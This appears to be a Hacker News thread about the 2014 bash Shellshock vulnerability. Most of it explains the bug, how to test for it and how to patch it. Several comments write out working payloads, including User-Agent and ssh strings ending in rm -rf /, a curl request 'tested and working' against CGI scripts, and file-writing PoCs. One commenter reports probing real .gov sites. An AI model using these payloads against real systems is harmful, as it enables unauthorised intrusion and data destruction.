CVE-2014-6271: Remote code execution through bash (opens in new tab)

(seclists.org)

905 pointsvault_11y ago416 comments

416 comments

There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on and OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

CSDude11y ago

I finally understand how it can be used.

jMyles11y ago

I'm sorry; perhaps I'm slow. I see the problem, but how can a stranger set an environment variable?

5 more replies

jimrandomh11y ago

If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.

matchu11y ago

So, as a amateur sysadmin of a decently popular side project, what should I do? I've read over the post on the mailing list, and I think I understand the basic attack, but I'm having trouble understanding exactly how an attacker could run bash on my server and what I therefore need to patch (though I suspect that's intentional). Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

vhost-11y ago

If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`

Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

3 more replies

sauere11y ago

> Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

Yes. Patch is out.

5 more replies

clarry11y ago

I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.

You might also look into changing the default shell (but beware, scripts with bashisms in them...).

1 more reply

zobzu11y ago

you should update all security updates, reliably, periodically, regardless of HN posts.

you're probably not directly vulnerable for this very vuln, but then again, maybe you are. with enough vulns it gets complex enough to check that its easier to just update with all the security updates..

1 more reply

cookiecaper11y ago

If you're still waiting for mirrors and such to sync, you can install these packages manually on the LTS releases with the snippet here:

http://hastebin.com/oraheyipug.hs

2 more replies

ilconsigliere11y ago

It will be once they release a patch, yes

https://security-tracker.debian.org/tracker/CVE-2014-6271

1 more reply

larrys11y ago

A good question that so far nobody has answered (as of right now).

larrys11y ago

"If you are responsible for the security of any system, this is your immediate, drop-everything priority."

Why don't you explain in plain english exactly why you feel this is the case? "Drop-everything" in other words (or even close to that). Give some scenarios. After all anyone who knows a great deal doesn't need that advice the people who need that advice are ones that don't know enough to know what the impact of this is. [1]

Perhaps you could clarify with some examples of why (see child comment "So, as a amateur sysadmin of a decently popular side project") you think this applies to anyone who is "responsible for the security of any system"?

[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.

tptacek11y ago

Any library anywhere in any application you run that calls out to bash that is called by any other library in that application, so long as that application is somehow hooked up to a web server, is potentially an unauthenticated GET request away from code execution; the exploit for this is potentially so simple that attackers can craft a single request, spider the Internet, and collect shells from applications you run that you forgot you even ran, at which point they'll own your whole data center.

Helpful?

2 more replies

nandhp11y ago

Because this allows execution of arbitrary commands from any unsantized environment variable.

Web servers pass information about the HTTP client to CGI scripts using environment variables. A CGI script written in bash would be vulnerable to arbitrary command execution if any HTTP header contained the vulnerable string.

    GET / HTTP/1.0
    User-Agent: () { :; }; rm -rf /

Restricted SSH accounts (like the ones used by GitHub) have a setting to restrict the user to a specific command (e.g. /usr/local/bin/run-git-only --github-user=octocat). The original command is passed in an environment variable SSH_ORIGINAL_COMMAND. If bash is used anywhere along the way (say, if /usr/local/bin/run-git-only --github-user=octocat is a shell script), then this is a problem:

    ssh git@example.com '() { :; }; rm -rf /'

There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.

Edit: as others have pointed out, even non-bash CGI scripts that use a shell to run external processes are vulnerable For example, system("/usr/local/bin/whatever --some-fixed-option") would normally be considered safe since there's no untrusted data in the command-line (although perhaps it would be considered poor design), but it'll run a shell to do the whitespace splitting. If that shell is bash....

4 more replies

maximumoverload11y ago

It doesn't have a nice catchy name and a logo, though

dsr_11y ago

Fine. Now it's called BashSmash. Are you happy? Go make a logo.

2 more replies

JoshTriplett11y ago

Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'
    exploit

jimrandomh11y ago

Attacker-controlled environment variable names are a rare scenario, and one that probably has you hosed no matter what. Attacker-controlled environment variable values, on the other hand, are not so rare, and if not for this vulnerability they wouldn't be a problem.

peterwwillis11y ago

More specifically: The environment in general is an attack vector. I mean, it's global input that crosses execution domains! Any name/value pair could potentially mess with any number of programs in unexpected ways. A user should not be able to control any environment changes, period. Of course, whether or not this is practical is an exercise for the sysadmin.

notacoward11y ago

It's not just you. The fact that an environment variable can override e.g. "git" to do something else is a real problem requiring separate protection. However, that's effectively PATH injection rather than code injection so it's already addressed in many cases.

JoshTriplett11y ago

Except that most environments already filter out attempts to control PATH, LD_LIBRARY_PATH, and similar; they don't filter out "git".

1 more reply

increment_i11y ago

I might be misunderstanding this, but this can be accomplished through http request headers?

1 more reply

sliverstorm11y ago

The vulnerability was released, what, a few hours ago? With a major vulnerability, waiting around for a "proper" fix is probably not a good idea. Get in a hot-patch to minimize the damage, then work on a "proper" fix...

andrew1311y ago

It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo

https://twitter.com/taviso/status/514887394294652929#

env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

Negitivefrags11y ago

Can anyone confirm that this is still a security issue?

My reading of this is that it's weird, and it's certainly a bug in the parser, but because you don't get to put the executable code in the environment variable it's not an RCE exploit like the last bug was.

Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?

timv11y ago

As best I can tell no one has (publicly) demonstrated a mechanism to turn this into an RCE (despite efforts to do so).

http://seclists.org/oss-sec/2014/q3/679

Of course, that doesn't mean there isn't one. It's clearly a reasonably significant issue - the setting of environment variables can cause unintended file system writes (and the same parsing bug can be used for reads) - and you're better off assuming that someone will determine an exploit based on it.

thaumaturgy11y ago

That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.

edit: OK, I give. I don't understand how this is different from,

    env z='' echo oops

So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,

    '' evil command here

...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused function embedded in environment variables to be executed when they were read.

Am I missing something?

1 more reply

timv11y ago

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014

Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit.

jMyles11y ago

Just tested on Ubuntu 14.04 patched.

"still vulnerable :("

timv11y ago

Chet (bash maintainer) says he has a fix.

http://seclists.org/oss-sec/2014/q3/682

andrew1311y ago

That's good news

caust1c11y ago

https://news.ycombinator.com/item?id=8365158

masterleep11y ago

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

mmastrac11y ago

Oh damn:

curl -H 'User-Agent: () { :;}; echo; echo vulnerable to CVE-2014-6271' <shell script CGI URL>

Tested and working against a shell script CGI.

darklajid11y ago

Whoa. I tried this, ran pacaur -Suy and .. it's patched.

Arch was fast.

gegenschall11y ago

If you're on Arch, you might want to think about using dash as your /usr/bin/sh after updating, see [0].

[0] https://wiki.archlinux.org/index.php/Dash

1 more reply

chjj11y ago

    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    vulnerable
    test
    $ pacman -Syu
    ...
    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    test

Benefits of using an OS with a real package manager.

1 more reply

javert11y ago

I learned today that some mirrors update their package database a lot faster than others. Had to switch mirrors to get the new bash.

https://www.archlinux.org/mirrors/status/

dllthomas11y ago

It's fixed in Debian as well.

2 more replies

antocv11y ago

http://seclists.org/oss-sec/2014/q3/672

Still vulnerable.

env X='() { (lol)=>\' bash -c "echo id"; cat echo

wyager11y ago

This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

cft11y ago

Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz 
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
  #build and install
  ./configure && make && make install

Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

ak21711y ago

Or you could just download a bash-static deb from 10.04 (https://launchpad.net/ubuntu/lucid/+package/bash-static) and overwrite /bin/bash. It shouldn't cause any issues when upgrading, though you could back up the original.

8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.

rtmdivine11y ago

Enter this PoC in your terminal:

env var='() {(a)=>\' bash -c "echo date"; cat echo

A target patched for CVE-2014-6271 will output the date upon executing that PoC (Proof of Concept):

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'

Thu Sep 25 17:52:32 EDT 2014

There is a new update (#26) for bash 4.3 which fixes CVE-2014-7169 (the old bash update was still flawed/incomplete as demonstrated above by executing the PoC). So, taking into account what everyone before contributed, the new complete patch code would be:

mkdir src

cd src

wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz

#download all patches

for i in $(seq -f "%03g" 0 26); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done

tar zxvf bash-4.3.tar.gz

cd bash-4.3

#apply all patches

for i in $(seq -f "%03g" 0 26);do patch -p0 < ../bash43-$i; done

#build and install

sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install

Once patched for CVE-2014-7169 the previous PoC should not return the date anymore:

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'

date

cat: echo: No such file or directory

And thanks to all previous contributors!

gklyne11y ago

This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.

I found a source copy at https://launchpad.net/ubuntu/+source/patch/2.5.9-4 and built/installed that first. The resulting fix appears to work (after copying resulting bash to /bin as noted elsewhere).

petercook11y ago

I had the same problem. I needed to install patch, make and gcc. So I downloaded the iso from http://old-releases.ubuntu.com/releases/hardy/ and then edited /etc/apt/sources.list so my server would look on the cd for the packages. I could then use 'apt-get install' to install the required programs. I also found that the 'do' command was throwing up an error. Rather than work out why I just manually downloaded the 26 patches and then manually applied them as well. Yeah ok I'm a noob but it worked.

oows11y ago

I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.

1 more reply

ricilake11y ago

This won't work; you need

sudo make install

Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.

On Ubuntu, you'll probably want to ./configure --prefix=/usr/bin . If you install in /usr/local/bin (the default), bash will effectively no longer be updated by apt-get.

ricilake11y ago

That should probably have been ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc

Once upon a time, distributions documented their build configurations. Or maybe it's that I used to only use FreeBSD.

1 more reply

struct7611y ago

I tried this and realized, it installs the binary under /usr/local/bin. you'll need to make a symlink or preferably follow ricilake's advice. if you forget to do this and logout, you may never log back in. Btw, the path to the bash in ubuntu is /bin/bash not /usr/bin/bash

SylentBobNJ11y ago

I just wanted to say, "Thanks!"

I successfully patched my 8.04 server and passed the test.

I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.

imaginenore11y ago

Why is my bash version still 4.2.45(1) after this?

    # bash --version
    bash --version
    GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)

Though it seems the vulnerability got fixed.

degubellini11y ago

Hi, I have tried to follow the instruction given by rtmdivine to patch for CVE-2014-6271 but at the end of the process I still get the date. Any suggestions? Thanks

sergioalonso11y ago

In Debian Lenny you should also do at the end sudo rm /bin/bash && sudo ln -s /usr/local/bin/bash /bin/bash

mathx11y ago

need to wget all the patches including #26 to fix the 2nd bug reported. instead why not just wget the whole dir of patches..

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \\.sig index.html cd bash-4.3; for i in ../bash43-*; do patch -p0 < $i; done

etc

mathx11y ago

wtf. this damn form ate my 's and stuff.
try again:

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \.sig index.html\*

should be no \'s (or \\s) before the *'s above.

1 more reply

rtmdivine11y ago

Does this fix CVE-2014-7169 as well, or just CVE-2014-6271?

agwa11y ago

It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

asveikau11y ago

I am sure tons of people reading already know this, but I have a habit of saying this everywhere I see system() mentioned anywhere on the internet, just in case somebody reading is tempted to use it: system() is evil, please for the love of god never use it.

If you need to invoke another program use execve() and friends. The versions that end in -p will even check PATH for you. You don't need a shell to evaluate your arguments. Cut out the middle man and pass the arguments directly. It will save you a lot of stupid bugs.

dllthomas11y ago

There's nothing wrong with using system anywhere you would happily cover your eyes and paste the string content into a shell. That shouldn't be many places, if anywhere, in production software. It's fine for simple things that would've been shell scripts anyway but for the need to XYZ.

agwa11y ago

The API for system() is not great, but the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting. As long as you're not passing arguments from outside sources to the command, using system() should be OK.

3 more replies

ForHackernews11y ago

Do you have a source for that? Some articles [0] claim "This affects Debian as well as other Linux distributions."

[0] http://www.csoonline.com/article/2687265/application-securit...

aroch11y ago

Debian7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):

    [arch/testbed ~] uname -a
    Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
    [arch/testbed ~]  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

3 more replies

agwa11y ago

You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!

ngcazz11y ago

Likely meaning that the Debian packages for Bash include the vulnerability

jkrems11y ago

Isn't /bin/sh vulnerable to the same thing? At least it seems for me:

    sh-3.2$ env x='() { :;}; echo vulnerable' /bin/sh -c "echo this is a test"
    vulnerable
    this is a test

joev_11y ago

/bin/sh depends on the system. It might be busybox or a minimal shell (this is common on embedded devices). On some systems like OSX and I think CentOS /bin/sh is just bash. You can check with `/bin/sh --version`.

1 more reply

korzun11y ago

Major impact of this is elevating privileges, both Debian and Ubuntu will be impacted just like any other system.

I don't think anybody is worried about software on the system that is using /bin/bash .vs /bin/sh.

dllthomas11y ago

Where is the privilege escalation? I get the same results from running id through tripping the bug as I do from running id directly.

Edited to add: Also no differences in capabilities when I cat /proc/self/status

None of which is to say there is clearly no such vulnerability - I'd just like to understand it if there is.

2 more replies

kazinator11y ago

Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

antocv11y ago

Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

scintill7611y ago

I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?

Edit: From my experiments, the name in (a) doesn't matter, and "echo" and "date" can be changed. The thing in echo's position is where the output goes (and can be an absolute path!), and "date" is a command that is run. Still no idea how it works, as I'm not very familiar with shell syntax and Googling symbols like "=>" is mostly useless. It may even be meaningless and is just garbage to get bash into a state that causes this to happen?

Edit 2: http://seclists.org/oss-sec/2014/q3/679 has a small example. "Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though"

codingbeer11y ago

I can't comprehend how this got buried so fast in the mist of "patch, patch, patch".

khaki5411y ago

So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

dtech11y ago

It allows arbitrary code execution if an attacker can modify environment variables through other software.

Most webservers put certain HTTP headers in environment variables. I can certainly see the how this could be exploited.

Someone123411y ago

> Most webservers put certain HTTP headers in environment variables.

I legitimately don't understand why they might do such a thing. Can you explain?

2 more replies

ck211y ago

http://www.csoonline.com/article/2687265/application-securit...

Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

adamt11y ago

On most systems I've found this works: LC_TIME='() { :;}; echo vulnerable' ssh <hostname>

Not sure of the impact of this, as the user would need to have a remote permissions anyway for the SSH login to occur. But if there was some form of restricted shell that then spawned bash it might potentially create an attack vector.

MrUnderhill11y ago

I was wondering about this too. My thinking was, if a user's laptop is compromised (and has the exploit in LC_TIME, TERM or similar), and the user then SSH in to a server with exploitable bash, the nefarious command will presumably be executed without the user knowing. But of course, if the laptop is compromised that badly, it could probably wreak havoc to the server anyway.

_wmd11y ago

As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.

scintill7611y ago

This vulnerability is the kind of reason I would have a stripped-down OpenSSH for public users, if I were them. Hard-code to do what they need, don't use configuration files, remove any features not needed. For example, to print the "You've successfully authenticated, but GitHub does not provide shell access." a user gets trying to ssh to github.com, don't invoke anything, print it directly from the SSH server.

graylights11y ago

Much easier to implement a custom captive shell (default login shell for user) then to mess with the crypto system.

1 more reply

thejosh11y ago

This is what Atlassian Stash does.

Eclyps11y ago

Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

rbliss11y ago

Still waiting for a fix on Beanstalk. Neither "yum clean all" followed by "yum update bash" nor "yum --releasever=2014.09 update bash" currently work.

EDIT: relevant AWS threads

https://forums.aws.amazon.com/thread.jspa?threadID=161489

https://forums.aws.amazon.com/thread.jspa?threadID=161529&ts...

rbliss11y ago

Should be fixed now:

To manually update EC2 instances managed by Elastic Beanstalk, you can run the following command:

For Amazon Linux 2013.09 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2013.09/updates/556c...

For Amazon Linux 2014.03 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2014.03/updates/e10f...

marbletiles11y ago

If yum still doesn't find it, you may be on an older release. Try "yum --releasever=2014.09 update bash"

prothid11y ago

I'm considering pulling an rpm from elsewhere until they have this in place.

Eclyps11y ago

It's updated now

jingo11y ago

A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

flebron11y ago

Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.

ckuehl11y ago

How are you testing it? If you're just pasting one of the proof-of-concept lines into zsh, such as this one:

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

...then you're really just executing bash. Replace "bash" in the line above with "zsh" and the "vulnerable" line is not printed.

adamtj11y ago

No, it's not printed in your trivial example, but if you replace the simple "echo" command with any bash script, or any executable that calls a bash script, or any executable that invokes another program that calls a bash script, or ... then you're screwed.

Even with the "zsh", this should print "vulnerable":

  env x='() { :;}; echo vulnerable' zsh -c "bash -c true"

You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:

  env x='() { :;}; echo vulnerable' zsh -c "python -c 'import os; os.system(\"true\")'"

1 more reply

flexd11y ago

I see this in zsh 5.0.0 on Ubuntu, and on OSX as well! zsh 5.0.2 (x86_64-apple-darwin13.0)

Crito11y ago

I'm not seeing this on zsh 4.3.17. Exactly what did you run to see this?

1 more reply

userbinator11y ago

According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

spb11y ago

I'm hoping we'll see a patch soon that altogether removes this misfeature.

EDIT: Apparently that's out of the question, but there's talk about using a BASH_FUNCDEFS variable to specify which variables are function definitions instead: http://www.openwall.com/lists/oss-security/2014/09/24/20

Zweihander11y ago

For more info: http://www.csoonline.com/article/2687265/application-securit...

This should be fun

nknighthb11y ago

CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.

I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

rmc11y ago

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

Yes, we've all known that. But we're slowly discovering all different ways the untrusted data can get there.

fl0wenol11y ago

FastCGI accepts name/value pairs from the server and most default language bindings against it will turn them into environment variables for the benefit of code that expects to be able to reference them. This can get tricky if you do anything that spawns a process with your code later.

peterwwillis11y ago

Almost all vendor-supplied web interfaces that don't come bundled with a web server are CGI so you can just run it from whatever web server you have. Even some very popular 'appliances' out there that have their own web server run CGI.

justincormack11y ago

People still shell out to do stuff from scripts from all sorts of languages. Unless these sanitize the environment they would be vulnerable.

1 more reply

huhtenberg11y ago

> hardly anybody uses it anymore anyway

Lots of PHP setups do.

2 more replies

why-el11y ago

Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.

yuvadam11y ago

They will be patching shortly [1]

[1] - https://twitter.com/jacobian/status/514865870649061376

why-el11y ago

Yep, they did. :)

Oculus11y ago

Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?

drzaiusapelord11y ago

Its been a bad time for FOSS/Linux systems. Heartbleed, the occasional priv escalation, apt-get, bash, etc. Or whatever the hell happened at TrueCrypt. Or the recent AOSP browser bug in Android that probably won't be patched by any OEM/Carrier. These are all pretty serious issues. Not to mention the endless wave of malware targeting Windows systems, especially the evil cryptolocker ransomware.

I really do think heartbleed was a wake-up call for some people and a lot of extra auditing is being done, perhaps with some healthy paranoia fueled by the recent NSA allegations. Software, in general, imo, is pretty insecure. The exploits, bugs, etc are out there and if you'll find them if you look hard enough. Considering software is always being updated, that also means news bugs and security issues.

As a sysadmin, I've just seen too often how the sausage is made. I have zero illusions about security. There are just too many avenues to compromise, be it via software or via plain-jane social engineering. I think one day in the future we (or our children) are going to look back at the age of viruses and buffer overflows and wonder how the hell we managed to get by, the same way I look at cars from the 50s-60s that suffered from things like vapor lock, were incredibly unsafe, and other issues that really don't exist today.

lonnyk11y ago

Are you referring to this apt-get vulnerability or another one: https://lists.debian.org/debian-security-announce/2014/msg00... ?

hijinks11y ago

http://www.cvedetails.com/browse-by-date.php

Its not like each year is an increase.. but it seems this year has had more major giant remote ones then in the past

dpeck11y ago

you're just paying attention. There have been some interesting ones the last year or two but this is really a trickle compared to early through mid 2000s

fromtheoutside11y ago

I still remember Redhat 6.2. Most remote exploits in a distribution ever.

zobzu11y ago

people started to pay attention. theres a bunch of new vulns being patched daily. if you follow cve's or oss list you can see that.

what's "new" (been done for a few years now) is that there's more marketing drive behind them. Fancy commercial names and websites dedicated and issues are often exaggerated.

Actually super critical vulns are still rare (like HB, codered, etc.)

h43k3r11y ago

I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

Afforess11y ago

Even a harmless code exploit, when run on a computer system you do not have normal permission to use, is a felony in the USA.

m4r71n11y ago

Some more information was just posted to oss-sec:

http://seclists.org/oss-sec/2014/q3/650

ecze11y ago

With this bug, bash access to CiscoCallmanager is possible... Tested and working....

MichaelGG11y ago

VoIP software is hilariously insecure in general. This little bug is going to make some people a ton of money. Or even just cost some people a lot.

q3k11y ago

Same for Cisco NX-OS...

AnimalMuppet11y ago

Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

prothid11y ago

Don't tell anyone.

hadoukenio11y ago

See:

http://en.wikipedia.org/wiki/Eternal_September

http://www.reddit.com/r/OutOfTheLoop/comments/1i8mp7/what_is...

MBlume11y ago

I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

acdha11y ago

You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.

The good news is that as long as you're not running a local server, the vulnerability is pretty limited particularly since even if you did have SSH enabled the exploit would require valid authentication first.

sehugg11y ago

There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).

http://support.apple.com/kb/HT4169

Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

1 more reply

legulere11y ago

At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.

1 more reply

mzs11y ago

http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

http://www.opensource.apple.com/source/bash/

xeroxmalf11y ago

You could move /bin/bash to another location, and then create a symlink from the Homebrew version to /bin/bash.

BenjaminCoe11y ago

Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse

bowlofpetunias11y ago

